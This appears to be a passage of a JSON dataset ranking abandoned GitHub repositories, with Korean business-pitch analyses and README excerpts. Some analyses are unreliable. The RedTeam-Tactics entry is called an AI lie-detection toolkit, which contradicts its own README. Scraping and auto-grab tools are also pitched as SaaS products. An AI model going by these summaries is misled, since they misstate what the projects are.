앱","readme_excerpt":"<p align=\"center\"><img src=\"example.gif\" width=\"600px\"/></p>\n\n<p align=\"center\">\n    <a href=\"https://travis-ci.org/BalestraPatrick/SquishButton\">\n        <img src=\"https://dashboard.buddybuild.com/api/statusImage?appID=594d396430fb80000135db8f&branch=master&build=latest\" alt=\"buddybuild\" />\n    </a>\n    <a href=\"https://github.com/Carthage/Carthage\">\n        <img src=\"https://img.shields.io/badge/carthage-compatible-4BC51D.svg?style=flat\" alt=\"Carthage\" />\n    </a>\n    <a href=\"http://cocoapods.org/pods/HapticButton\">\n        <img src=\"https://img.shields.io/cocoapods/l/HapticButton.svg?style=flat\" alt=\"License\" />\n    </a>\n    <a href=\"http://cocoapods.org/pods/SquishButton\">\n        <img src=\"https://img.shields.io/cocoapods/p/SquishButton.svg?style=flat\" alt=\"Platform\" />\n    </a>\n    <a href=\"https://twitter.com/BalestraPatrick\">\n        <img src=\"https://img.shields.io/badge/contact-@BalestraPatrick-yellow.svg?style=flat\" alt=\"Twitter: @BalestraPatrick\" />\n    </a>\n</p>\n\n# Haptic","composite_score":0.5928,"license_safety_tag":"safe"},{"name":"uglide/RedisDesktopManager","github_url":"https://github.com/uglide/RedisDesktopManager","stars":7,"language":"C++","license":"NOASSERTION","abandonment_months":23,"description":"# RedisDesktopManager 상용화 분석\n\n## 왜 보물인가\n데이터베이스를 마우스 클릭으로 관리할 수 있는 도구로, 복잡한 기술 없이도 데이터를 쉽게 조회하고 수정할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 데이터 관리 웹 플랫폼으로, 기업 고객이 자신의 데이터베이스를 브라우저에서 직접 관리하는 유료 서비스\n2. *","readme_excerpt":"## RESP.app - GUI for Redis &reg; (Formerly RedisDesktopManager)\n\n### RESP.app is joining forces with Redis to offer the Redis community the best possible developer experience and to increase productivity when developing with Redis.\nPlease read [this blog post](https://redis.com/blog/respapp-joining-redis/) where we share more details, and you can also visit the [FAQ](https://resp.app/faq).\n\n<hr>\n\n![RESP.app screenshot](http://resp.app/static/img/features/all.png?v2021)\n\n\n","composite_score":0.5923,"license_safety_tag":"unknown"},{"name":"fd0/machma","github_url":"https://github.com/fd0/machma","stars":499,"language":"Go","license":"BSD-2-Clause","abandonment_months":66,"description":"# fd0/machma 분석 보고서\n\n## 왜 보물인가\n여러 작업을 동시에 빠르게 처리할 수 있는 기술로, 데이터 처리 속도가 중요한 회사들에게 핵심 도구가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 실시간 데이터 분석 플랫폼에서 고객들의 대량 정보를 동시에 처리하는 백엔드 기술\n2. **내부 업무 도구**: 대규모 기업의 ","readme_excerpt":"[![Status badge for tests](https://github.com/fd0/machma/workflows/Build%20and%20tests/badge.svg)](https://github.com/fd0/machma/actions?query=workflow%3A%22Build+and+tests%22)\n\n# machma - Easy parallel execution of commands with live feedback\n\n## Introduction\n\nIn order to fully utilize modern machines, jobs need to be run in parallel. For\nexample, resizing images sequentially takes a lot of time, whereas working on\nmultiple images in parallel makes much better use of a multi-core CPU and\ntherefore is much faster. This tool makes it very easy to execute tasks in\nparallel and provides live feedback. In case of errors or lines printed by the\nprogram, the messages are tagged with the job name.\n\n`machma` by default reads newline-separated values and replaces all\ncommand-line arguments set to `{}` with the file name. The number of jobs is\nset to the number of cores for the CPU of the host `machma` is running on.\n\n## Sample Usage\n\nResize all images found in the current directory and sub-dire","composite_score":0.5919,"license_safety_tag":"safe"},{"name":"DIGITALCRIMINAL/OnlyFans","github_url":"https://github.com/DIGITALCRIMINAL/OnlyFans","stars":5,"language":"Python","license":"GPL-3.0","abandonment_months":24,"description":"# DIGITALCRIMINAL/OnlyFans 저장소 분석\n\n## 왜 보물인가\nOnlyFans 플랫폼의 콘텐츠를 자동으로 수집하고 관리할 수 있는 도구로, 콘텐츠 크리에이터나 마케팅 담당자들이 대량의 데이터를 효율적으로 처리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **콘텐츠 분석 SaaS**: OnlyFans 크리에이터를 위한 성과 분석 및 ","readme_excerpt":"# UltimaScraper (Python 3.10.1+)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n[![Twitter](https://img.shields.io/twitter/url/https/twitter.com/0xHoarder.svg?style=social&label=Follow%200xHoarder)](https://twitter.com/0xHoarder)\n# ![app-token](ultima_scraper/docs/assets/img/64255399-96a86700-cf21-11e9-8c62-87a483f33701.png)\n# 27th January 2023 Migration\n    You can either start the script or create the __settings__ and __user_data__ folders manually.\n    ~~~~~~~~\n    Move config.json file into \"__settings__\"\n    RENAME \".profiles\" folder to \"profiles\" and move it into \"__user_data__\"\n# List of things I know that are broken:\n    Profile and header images aren't downloading\n    UI (Download Progress Bars to be exact)\n# Mandatory Tutorial\n\nRead the [#FAQ](README.md#faq) at the bottom of this page before submitting a issue.\n\n## Running the app locally\nFrom the project folder open Windows Powershell/Terminal and run the comm","composite_score":0.5917,"license_safety_tag":"restricted"},{"name":"jupeter/clean-code-php","github_url":"https://github.com/jupeter/clean-code-php","stars":5,"language":"PHP","license":"mit","abandonment_months":25,"description":"# clean-code-php 분석 보고서\n\n## 왜 보물인가\n프로그래머들이 실수하기 쉬운 나쁜 코딩 습관을 교정하는 가이드북으로, 누구나 읽고 배울 수 있는 실용적인 PHP 코딩 교과서입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 교육 플랫폼**: 개발자 교육 과정에 통합하여 월 구독 모델의 온라인 코딩 교실 운영\n- **기업 내부 개발 표준화 도구","readme_excerpt":"# Clean Code PHP\n\n## Table of Contents\n\n  1. [Introduction](#introduction)\n  2. [Variables](#variables)\n     * [Use meaningful and pronounceable variable names](#use-meaningful-and-pronounceable-variable-names)\n     * [Use the same vocabulary for the same type of variable](#use-the-same-vocabulary-for-the-same-type-of-variable)\n     * [Use searchable names (part 1)](#use-searchable-names-part-1)\n     * [Use searchable names (part 2)](#use-searchable-names-part-2)\n     * [Use explanatory variables](#use-explanatory-variables)\n     * [Avoid nesting too deeply and return early (part 1)](#avoid-nesting-too-deeply-and-return-early-part-1)\n     * [Avoid nesting too deeply and return early (part 2)](#avoid-nesting-too-deeply-and-return-early-part-2)\n     * [Avoid Mental Mapping](#avoid-mental-mapping)\n     * [Don't add unneeded context](#dont-add-unneeded-context)\n  3. [Comparison](#comparison)\n     * [Use identical comparison](#use-identical-comparison)\n     * [Null coalescing operator](#nul","composite_score":0.5905,"license_safety_tag":"safe"},{"name":"push-stream/push-stream","github_url":"https://github.com/push-stream/push-stream","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":43,"description":"","readme_excerpt":"# push-stream\n\nThis is a reimagining of what a push-style stream could be.\n\n`push-stream` harkens back to the original [node.js classic streams](http://dominictarr.com/post/145135293917/history-of-streams)\nbut without several of the unrealized-at-the-time blunders of classic streams.\n\n* don't use event emitters. emitters magnify the needed number of objects, and it's not necessary to assign event listeners to properly working streams.\n  when that is needed, pipe to a stream that supports inspection or wrap the stream to be monitored.\n* don't support multiple destinations - most streams are piped only to one destination. to use a plumbing metaphore, when you want to connect split one pipe into two, you use a special T or Y shaped connector.\n* have a `paused` property instead of `write()` returning paused, this means you can know whether\n  your destination is paused _before_ you call write.\n* call a `resume` method on the source stream (that stays the same) instead of assigning and reass","composite_score":0.5904,"license_safety_tag":"safe"},{"name":"mantvydasb/RedTeam-Tactics-and-Techniques","github_url":"https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques","stars":6,"language":"PowerShell","license":"unknown","abandonment_months":21,"description":"# RedTeam-Tactics-and-Techniques 저장소 분석\n\n## 왜 보물인가\n인공지능 시스템의 거짓말 탐지 및 검증 기술을 실제 공격 시나리오로 테스트할 수 있는 실무 자료모음입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 검증 솔루션 SaaS**: AI가 제공하는 답변의 신뢰도를 자동으로 검사하는 웹 서비스\n2. **기업 AI 감시 도구*","readme_excerpt":"---\ndescription: >-\n  These are notes about all things focusing on, but not limited to, red teaming\n  and offensive security.\n---\n\n# What is ired.team notes?\n\nThis is publicly accessible personal red teaming notes at [https://ired.team](https://ired.team) and [https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques](https://github.com/mantvydasb/RedTeam-Tactics-and-Techniques) about my pentesting / red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and actual adversaries.\n\nThis is my way of learning things - by doing, following, tinkering, exploring, repeating and taking notes.\n\nAt ired.team, I explore some of the common offensive security techniques involving gaining code execution, code injection, defense evasion, lateral movement, persistence and more.\n\nMost of these techniques are discovered by other security researchers and I do not claim their ownership. I try to reference the sour","composite_score":0.5904,"license_safety_tag":"unknown"},{"name":"xxhomey19/nba-go","github_url":"https://github.com/xxhomey19/nba-go","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":41,"description":"# NBA-GO 저장소 분석\n\n## 왜 보물인가\nNBA 농구 경기 정보를 손쉽게 검색하고 조회할 수 있는 도구로, 스포츠 팬이나 데이터 활용자들이 실시간 경기 정보에 접근하는 번거로움을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스포츠 뉴스 SaaS**: 기자나 콘텐츠 제작자가 NBA 경기 데이터를 자동으로 수집하여 기사 작성 시간을 단축","readme_excerpt":"<p align=center>\n<img src=\"https://user-images.githubusercontent.com/12113222/32413609-ea673d3e-c24f-11e7-935b-0a2a86be0ee2.png\">\n</p>\n<p align=center>\n<a target=\"_blank\" href=\"https://npmjs.org/package/nba-go\" title=\"NPM version\"><img src=\"https://img.shields.io/npm/v/nba-go.svg\"></a>\n<a target=\"_blank\" href=\"https://travis-ci.org/xxhomey19/nba-go\" title=\"Build Status\"><img src=\"https://travis-ci.org/xxhomey19/nba-go.svg?branch=master\"></a>\n<a target=\"_blank\" href=\"http://nodejs.org/download/\" title=\"Node version\"><img src=\"https://img.shields.io/badge/node.js-%3E=_6.0-green.svg\"></a>\n<a target=\"_blank\" href=\"https://opensource.org/licenses/MIT\" title=\"License: MIT\"><img src=\"https://img.shields.io/badge/License-MIT-blue.svg\"></a>\n<a target=\"_blank\" href=\"http://makeapullrequest.com\" title=\"PRs Welcome\"><img src=\"https://img.shields.io/badge/PRs-welcome-brightgreen.svg\"></a>\n</p>\n\n> The finest NBA CLI.\n\nWatch NBA live play-by-play, game preview, box score and player information on you","composite_score":0.5903,"license_safety_tag":"safe"},{"name":"ethereum-mining/ethminer","github_url":"https://github.com/ethereum-mining/ethminer","stars":5,"language":"C++","license":"GPL-3.0","abandonment_months":31,"description":"# ethereum-mining/ethminer 분석 보고서\n\n## 왜 보물인가\n이더리움 채굴이라는 고수익 활동을 누구나 쉽게 시작할 수 있게 만든 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **채굴 풀 운영 서비스**: 개인 채굴자들이 함께 채굴해서 수익을 나누는 플랫폼으로, 관리비 3~5%를 받고 운영\n2. **채굴 전문 컨설팅**: 채굴 사업을 시작","readme_excerpt":"# ethminer\n\n[![standard-readme compliant](https://img.shields.io/badge/readme%20style-standard-brightgreen.svg)](https://github.com/RichardLitt/standard-readme)\n[![Gitter](https://img.shields.io/gitter/room/nwjs/nw.js.svg)][Gitter]\n[![Releases](https://img.shields.io/github/downloads/ethereum-mining/ethminer/total.svg)][Releases]\n\n> Ethereum miner with OpenCL, CUDA and stratum support\n\n**Ethminer** is an Ethash GPU mining worker: with ethminer you can mine every coin which relies on an Ethash Proof of Work thus including Ethereum, Ethereum Classic, Metaverse, Musicoin, Ellaism, Pirl, Expanse and others. This is the actively maintained version of ethminer. It originates from [cpp-ethereum] project (where GPU mining has been discontinued) and builds on the improvements made in [Genoil's fork]. See [FAQ](#faq) for more details.\n\n## Features\n\n* OpenCL mining\n* Nvidia CUDA mining\n* realistic benchmarking against arbitrary epoch/DAG/blocknumber\n* on-GPU DAG generation (no more DAG files on d","composite_score":0.5903,"license_safety_tag":"restricted"},{"name":"extreme-assistant/CVPR2021-Paper-Code-Interpretation","github_url":"https://github.com/extreme-assistant/CVPR2021-Paper-Code-Interpretation","stars":6,"language":"","license":"unknown","abandonment_months":25,"description":"# CVPR2021-Paper-Code-Interpretation 분석\n\n## 왜 보물인가\n2021년 최고 수준의 컴퓨터 비전 논문들을 실제 구현 코드와 함께 설명하는 교육 자료로, 인공지능 기술을 실무에 적용하려는 기업과 개발자들에게 필수 학습 자원입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 교육 SaaS**: 대학원이나 개발 부트캠프에서 구독형으로","readme_excerpt":"\n* 推荐阅读：<br>\n  * [ICCV2021/2019/2017 论文/代码/解读/直播合集](https://github.com/extreme-assistant/ICCV2021-Paper-Code-Interpretation)\n  * [2020-2021年计算机视觉综述论文汇总](https://github.com/extreme-assistant/survey-computer-vision)<br>\n  * [国内外优秀的计算机视觉团队汇总](https://github.com/extreme-assistant/Awesome-CV-Team)\n------\n\n# cvpr2024/cvpr2023/cvpr2022/cvpr2021/cvpr2020/cvpr2019/cvpr2018/cvpr2017（Papers/Codes/Project/Paper reading）\n论文解读+技术直播汇总：https://bbs.cvmart.net/articles/4368 <br>\n论文分类汇总：https://bbs.cvmart.net/articles/4267<br><br>\n2000~2021年历届CVPR最佳论文代码，解读等汇总：http://bbs.cvmart.net/topics/665/CVPR-Best-Paper<br>\n<br>\n\n# 目录\n\n[11. CVPR2024论文解读汇总](#10)<br>\n[10. CVPR2023最新信息及论文下载](#10)<br>\n[9. CVPR2022最新信息及论文下载](#9)<br>\n[8. CVPR2021论文下载/代码/解读/直播](#8)<br>\n[7. CVPR2021论文分方向盘点](#7)<br>\n[6. CVPR2020论文下载/代码/解读/直播](#6)<br>\n[5. CVPR2020论文分方向盘点](#5)<br>\n[4. CVPR2019全部论文下载/开源代码](#4)<br>\n[3. CVPR2019论文分方向盘点](#3)<br>\n[2. CVPR2019论文直播分享](#2)<br>\n[1. CVPR2018/CVPR2017](#1)<br>\n\n\n\n<br>\n<a name=\"11\"/> \n\n# 11. CVPR2024论文解读汇总","composite_score":0.5899,"license_safety_tag":"unknown"},{"name":"jiahaog/nativefier","github_url":"https://github.com/jiahaog/nativefier","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":32,"description":"# Nativefier 분석 리포트\n\n## 왜 보물인가\n웹사이트를 마치 휴대폰이나 컴퓨터에 설치된 앱처럼 사용할 수 있게 변환해주는 도구로, 개발자들이 웹 기반 업무 도구를 더 편하게 관리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (앱화 제공형)**\n- 웹 기반 프로젝트 관리 도구를 윈도우/맥 앱처럼 제공하여 사용자 편의성","readme_excerpt":"Note: Nativefier is unmaintained, please see https://github.com/nativefier/nativefier/issues/1577.\n\n# Nativefier\n\n![Example of Nativefier app in the macOS dock](.github/dock-screenshot.png)\n\nYou want to make a native-looking wrapper for WhatsApp Web (or any web page).\n\n```bash\nnativefier 'web.whatsapp.com'\n```\n\n![Walkthrough animation](.github/nativefier-walkthrough.gif)\n\nYou're done.\n\n## Introduction\n\nNativefier is a command-line tool to easily create a “desktop app” for any web site\nwith minimal fuss. Apps are wrapped by [Electron](https://www.electronjs.org/)\n(which uses Chromium under the hood) in an OS executable (`.app`, `.exe`, etc)\nusable on Windows, macOS and Linux.\n\nI built this because I grew tired of having to Alt-Tab to my browser and then search\nthrough numerous open tabs when using Messenger or\nWhatsapp Web ([HN thread](https://news.ycombinator.com/item?id=10930718)). Nativefier features:\n\n- Automatically retrieval of app icon / name\n- Injection of custom JS & CSS\n- Many","composite_score":0.5898,"license_safety_tag":"safe"},{"name":"cuiocean/ZY-Player","github_url":"https://github.com/cuiocean/ZY-Player","stars":6,"language":"Vue","license":"MIT","abandonment_months":40,"description":"# ZY-Player 저장소 분석\n\n## 왜 보물인가\n동영상 재생 관련 기술을 직접 만들거나 커스터마이징하려는 개발자/회사들이 자유롭게 사용할 수 있는 기초 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 강의 영상 재생 기능을 직접 개발하되 비용 걱정 없이 구축\n2. **스트리밍 서비스 백엔드**: 자체 동영상 플레이어 기능을 기","readme_excerpt":"<p align=\"center\">\n<img width=\"128\" src=\"https://i.loli.net/2020/05/07/9kLvPnWVCp7538c.png\" >\n</p>\n<p align=\"center\">\n<a href=\"http://zyplayer.fun/\" target=\"_blank\">官网</a>\n<a href=\"https://github.com/Hunlongyu/ZY-Player/issues\" target=\"_blank\">反馈</a>\n</p>\n<p align=\"center\">\n<img src=\"https://forthebadge.com/images/badges/built-with-love.svg\">\n<p>\n<p align=\"center\">\n<img src=\"https://github.com/aleen42/badges/raw/master/src/visual_studio_code_flat_square.svg?sanitize=true\">\n<img src=\"https://github.com/aleen42/badges/raw/master/src/vue_flat_square.svg?sanitize=true\">\n<img src=\"https://github.com/aleen42/badges/raw/master/src/javascript_flat_square.svg?sanitize=true\">\n<img src=\"https://github.com/aleen42/badges/raw/master/src/eslint_flat_square.svg?sanitize=true\">\n</p>\n<p align=\"center\">\n<img alt=\"GitHub All Releases\" src=\"https://img.shields.io/github/downloads/Hunlongyu/ZY-Player/total?style=for-the-badge\">\n<img alt=\"GitHub release (latest by date including pre-releases)\" src=\"https://","composite_score":0.5897,"license_safety_tag":"safe"},{"name":"Piplin/Piplin","github_url":"https://github.com/Piplin/Piplin","stars":6,"language":"PHP","license":"MIT","abandonment_months":68,"description":"# Piplin/Piplin 분석 보고서\n\n## 왜 보물인가\n서버 배포와 운영을 자동화해주는 도구로, 개발팀이 손으로 일일이 할 필요 없이 코드 변경 사항을 자동으로 서버에 반영할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션 운영 회사가 월 구독료를 받고 자동 배포 기능을 고객에게 제공하는 서비스\n2. **내","readme_excerpt":"# Piplin - [![Composer Cache](https://shield.with.social/cc/github/Piplin/Piplin/master.svg?style=flat-square)](https://packagist.org/packages/laravel/framework)\n\n[![StyleCI](https://styleci.io/repos/67609292/shield)](https://styleci.io/repos/67609292/)\n[![Build Status](https://travis-ci.org/Piplin/Piplin.svg?branch=master)](https://travis-ci.org/Piplin/Piplin)\n[![Software License](https://img.shields.io/badge/license-MIT-brightgreen.svg?style=flat-square)](LICENSE)\n\nPiplin(灵感来自于\"pipeline\"，读作/ˈpɪpˌlɪn/ 或 /ˈpaɪpˌlaɪn/)是一款免费、开源的持续集成与部署系统，适用于软件的自动化构建、测试和部署相关的各种应用场景。\n\n\n![Screenshot](http://piplin.com/img/screenshot.png?v1)\n\n## Piplin能做什么？\n\n* 支持PHP、Python、JAVA、Ruby等项目的构建、测试与发布\n* 可与Gitlab、Github、Gogs、Gitee(Oschina)等代码托管平台进行集成\n* 可灵活配置自定义构建和部署步骤\n* 支持自定义构建物规则，对构建物创建发布版本并部署\n* 支持项目的多环境部署(可自行建立开发、测试、预发布和生产等多个环境)\n* 支持联动部署，比如：开发环境部署成功后可自动触发测试环境启动部署\n* 服务管理支持机柜功能，机柜可与多个部署环境绑定\n* 支持项目克隆功能\n* 项目支持多成员\n* 通过Websocket实现项目部署状态的实时跟踪\n* 支持钉钉机器人、Slack、邮件和自定义Webhook的服务集成\n\n## Piplin原理示意图\n\n### 总体\n\n![Principle](http:/","composite_score":0.5891,"license_safety_tag":"safe"},{"name":"anaskhan96/soup","github_url":"https://github.com/anaskhan96/soup","stars":9,"language":"Go","license":"MIT","abandonment_months":31,"description":"# soup 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 필요한 정보를 자동으로 추출해주는 도구로, 데이터 수집이 필요한 모든 비즈니스에서 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 부동산·구인 사이트에서 매물 정보를 자동 수집해 통합 검색 플랫폼 제공\n- **내부 업무 도구**: 경쟁사 가격 모니터링, 시장 뉴스 자동 수집 ","readme_excerpt":"# soup\n[![Build Status](https://travis-ci.org/anaskhan96/soup.svg?branch=master)](https://travis-ci.org/anaskhan96/soup)\n[![GoDoc](https://godoc.org/github.com/anaskhan96/soup?status.svg)](https://pkg.go.dev/github.com/anaskhan96/soup)\n[![Go Report Card](https://goreportcard.com/badge/github.com/anaskhan96/soup)](https://goreportcard.com/report/github.com/anaskhan96/soup)\n\n**Web Scraper in Go, similar to BeautifulSoup**\n\n*soup* is a small web scraper package for Go, with its interface highly similar to that of BeautifulSoup.\n\nExported variables and functions implemented till now :\n```go\nvar Headers map[string]string // Set headers as a map of key-value pairs, an alternative to calling Header() individually\nvar Cookies map[string]string // Set cookies as a map of key-value  pairs, an alternative to calling Cookie() individually\nfunc Get(string) (string,error) {} // Takes the url as an argument, returns HTML string\nfunc GetWithClient(string, *http.Client) {} // Takes the url and a custom","composite_score":0.5884,"license_safety_tag":"safe"},{"name":"weilanwl/ColorUI","github_url":"https://github.com/weilanwl/ColorUI","stars":6,"language":"Vue","license":"MIT","abandonment_months":26,"description":"# ColorUI 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 색상 조합을 미리 정해둔 디자인 도구로, 누구나 쉽게 예쁜 화면을 만들 수 있도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 저비용 웹 빌더나 노코드 플랫폼에서 기본 디자인 템플릿으로 제공\n- **내부 업무 도구**: 회사의 관리 프로그램이나 대시보드","readme_excerpt":"\n\n<p align=\"center\">V3 测试版：https://github.com/weilanwl/coloruiBeta</p>\n\n\n<p align=\"center\"><img src=\"https://cos.color-ui.com/web/zva3m.png\" alt=\"ColorUI简介\" width=\"75%\"></img></p>\n\n## 素材\nColorUI在语雀有个群友共同在维护的知识库，里面有一些群友改的模板和UI素材供开发使用哦！\n[语雀-ColorUI群资源](https://www.yuque.com/colorui)\n\n## 前言\nColorUI是一个css库！！！在你引入样式后可以根据class来调用组件，一些含有交互的操作我也有简单写，可以为你开发提供一些思路。\n\n## 交流\n微信群：加入微信群请先添加开发者微信，备注UniApp插件市场。QQ群：240787041 或扫描二维码。\n<p align=\"center\"><img src=\"https://cos.color-ui.com/web/km4js.png\" alt=\"\" style=\"max-width:100%;\" width=\"748\"></p>\t\t\t\t  \n\n\n## 使用UniApp开发\n### 开始\n下载源码解压获得`/Colorui-UniApp`文件夹，复制目录下的 `/colorui` 文件夹到你的项目根目录\n\n`App.vue` 引入关键Css `main.css` `icon.css`\n```css\n<style>\n@import \"colorui/main.css\";\n@import \"colorui/icon.css\";\n@import \"app.css\"; /* 你的项目css */\n....\n</style>\n```\n\n### 使用自定义导航栏\n导航栏作为常用组件有做简单封装，当然你也可以直接复制代码结构自己修改，达到个性化目的。\n\n`App.vue` 获得系统信息\n```js\nonLaunch: function() {\n  uni.getSystemInfo({\n    success: function(e) {\n      // #ifndef MP\n      Vue.prototype.StatusBar = e.status","composite_score":0.5879,"license_safety_tag":"safe"},{"name":"geeeeeeeeek/WeChatLuckyMoney","github_url":"https://github.com/geeeeeeeeek/WeChatLuckyMoney","stars":5,"language":"Java","license":"MIT","abandonment_months":89,"description":"# WeChatLuckyMoney 프로젝트 분석\n\n## 왜 보물인가\n중국의 메시지 앱 위챗에서 선물 돈을 자동으로 받는 기능을 만든 도구로, 수천만 명이 쓰는 플랫폼의 자동화 수요를 충족합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 위챗 사용자들을 위한 \"자동 선물금 수령 앱\" 구독 서비스\n- **내부 업무 도구**: 기업의 위챗 기반 직","readme_excerpt":"# 微信红包\n\n[![Gitter](https://badges.gitter.im/geeeeeeeeek/WeChatLuckyMoney.svg)](https://gitter.im/geeeeeeeeek/WeChatLuckyMoney?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=body_badge) [![Build Status](https://travis-ci.org/geeeeeeeeek/WeChatLuckyMoney.svg?branch=stable)](https://travis-ci.org/geeeeeeeeek/WeChatLuckyMoney)  [![Docs](https://img.shields.io/badge/Docs-English-blue.svg)](https://github.com/geeeeeeeeek/WeChatLuckyMoney/blob/stable/README_EN.md)\n\n一个帮助你在微信抢红包时战无不胜的Android应用。自动检测并且拆开红包，速度超乎你的想象。\n\n支持中英文。前往[**Release**](https://github.com/geeeeeeeeek/WeChatLuckyMoney/releases/)下载最新版本。已下载用户可直接在设置里面更新。\n\n### 特性\n\n- **监视选项任意组合，满足多样化的使用需求**[[?]](https://github.com/geeeeeeeeek/WeChatLuckyMoney/issues/48)\n\n  提供了`系统通知`/`聊天列表`/`聊天页面`三档选项，无论是想要谨慎不被察觉，还是想要高效志在必得，这个插件如你所愿。\n\n- **不仅快人一步，红包识别更加智能**\n\n  多种特征标识，聊天时不再重复点击红包。智能过滤红包关键字[[?]](https://github.com/geeeeeeeeek/WeChatLuckyMoney/issues/97)，避免落入“专属红包”、“抢到翻倍”的陷阱。还可以设置延时抢红包和自动回复感谢语[[?]](https://github.com/geeeeeeeeek/WeCha","composite_score":0.5878,"license_safety_tag":"safe"},{"name":"monsta-hd/boltzmann-machines","github_url":"https://github.com/monsta-hd/boltzmann-machines","stars":7,"language":"Jupyter Notebook","license":"MIT","abandonment_months":55,"description":"# Boltzmann Machines 저장소 분석\n\n## 왜 보물인가\n복잡한 패턴을 자동으로 학습하는 AI 기술로, 이미지 인식, 음성 처리, 추천 시스템 등 다양한 서비스에 핵심 엔진으로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 사용자 행동 패턴 분석 기반 개인화 추천 플랫폼 (음악/상품 추천 서비스)\n2. **내부","readme_excerpt":"<p float=\"left\">\n  <img src=\"img/dbm_mnist/rbm1.png\" width=\"129\" />\n  <img src=\"img/dbm_mnist/samples.png\" width=\"132\" />\n  <img src=\"img/dbm_cifar2/rbm_small_0.png\" width=\"129\" />\n  <img src=\"img/dbm_cifar2/grbm.png\" width=\"129\" />\n  <img src=\"img/dbm_cifar2/mrbm.png\" width=\"129\" />\n  <img src=\"img/dbm_cifar/samples.png\" width=\"129\" />\n</p>\n\n# Boltzmann Machines\nThis repository implements generic and flexible RBM and DBM models with lots of features and reproduces some experiments from *\"Deep boltzmann machines\"* [**[1]**](#1), *\"Learning with hierarchical-deep models\"* [**[2]**](#2), *\"Learning multiple layers of features from tiny images\"* [**[3]**](#3), and some others.\n\n## Table of contents\n* [What's Implemented](#whats-implemented)\n   * [Restricted Boltzmann Machines (RBM)](#restricted-boltzmann-machines-rbm)\n   * [Deep Boltzmann Machines (DBM)](#deep-boltzmann-machines-dbm)\n   * [Common features](#common-features)\n* [Examples](#examples)\n   * [#1 RBM MNIST: <a href=\"examples/rbm","composite_score":0.5871,"license_safety_tag":"safe"},{"name":"minimaxir/big-list-of-naughty-strings","github_url":"https://github.com/minimaxir/big-list-of-naughty-strings","stars":9,"language":"Python","license":"mit","abandonment_months":26,"description":"# Big List of Naughty Strings 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 자신의 프로그램이 이상한 입력값(특수문자, 이모지, 긴 텍스트 등)을 받았을 때도 제대로 작동하는지 테스트할 수 있도록 도와주는 검증 도구입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 설문조사 SaaS**\n사용자가 입력한 답변(특수문자, 다국어 등)이","readme_excerpt":"# Big List of Naughty Strings\nThe Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer [walks into a bar](http://www.sempf.net/post/On-Testing1).\n\n## Why Test Naughty Strings?\n\nEven multi-billion dollar companies with huge amounts of automated testing can't find every bad input. For example, look at what happens when you try to Tweet a [zero-width space](https://en.wikipedia.org/wiki/Zero-width_space) (U+200B) on Twitter:\n\n![](http://i.imgur.com/HyDg2eV.gif)\n\nAlthough this is not a malicious error, and typical users aren't Tweeting weird unicode, an \"internal server error\" for unexpected input is never a positive experience for the user, and may in fact be a symptom of deeper string-validation issues. The Big List of Naughty Strings is intended to help reveal such issues.\n\n## Usage\n\n`blns.txt` ","composite_score":0.5866,"license_safety_tag":"safe"},{"name":"Dimillian/MovieSwiftUI","github_url":"https://github.com/Dimillian/MovieSwiftUI","stars":8,"language":"Swift","license":"Apache-2.0","abandonment_months":29,"description":"","readme_excerpt":"![Xcode build](https://github.com/Dimillian/MovieSwiftUI/workflows/Xcode%20build/badge.svg?branch=master)\n\n# MovieSwiftUI\n\nMovieSwiftUI is an application that uses the MovieDB API and is built with SwiftUI. \nIt demos some SwiftUI (& Combine) concepts. The goal is to make a real world application using SwiftUI only. It'll be updated with new features as they come to the SwiftUI framework. \n\nI have written a series of articles that document the design and architecture of the app: [Making a Real World Application With SwiftUI](https://medium.com/better-programming/collection-making-a-real-world-application-with-swiftui-4f9bc8c7fb71).\n\n![App Image](images/MovieSwiftUI_promo_new.png?)\n\n## Architecture\n\nMovieSwiftUI data flow is a subset and a custom implementation of the Flux part of [Redux](https://redux.js.org/). \nIt implement the State in an [ObservableObject](https://developer.apple.com/documentation/combine/observableobject) as a @Published wrapped property, so changes are published wh","composite_score":0.5862,"license_safety_tag":"safe"},{"name":"PRML/PRMLT","github_url":"https://github.com/PRML/PRMLT","stars":11,"language":"MATLAB","license":"MIT","abandonment_months":76,"description":"# PRML/PRMLT 저장소 분석\n\n## 왜 보물인가\n기계학습의 이론을 실제 코드로 직접 구현한 교육용 자료로, 복잡한 인공지능 기술을 단계별로 배울 수 있는 학습 보물입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 기계학습 초급자 대상 유료 강좌 또는 인증 과정\n2. **기업 내부 교육 도구**: IT팀이나 데이터 분석팀의 역량 강","readme_excerpt":"Introduction\n-------\nThis Matlab package implements machine learning algorithms described in the great textbook:\nPattern Recognition and Machine Learning by C. 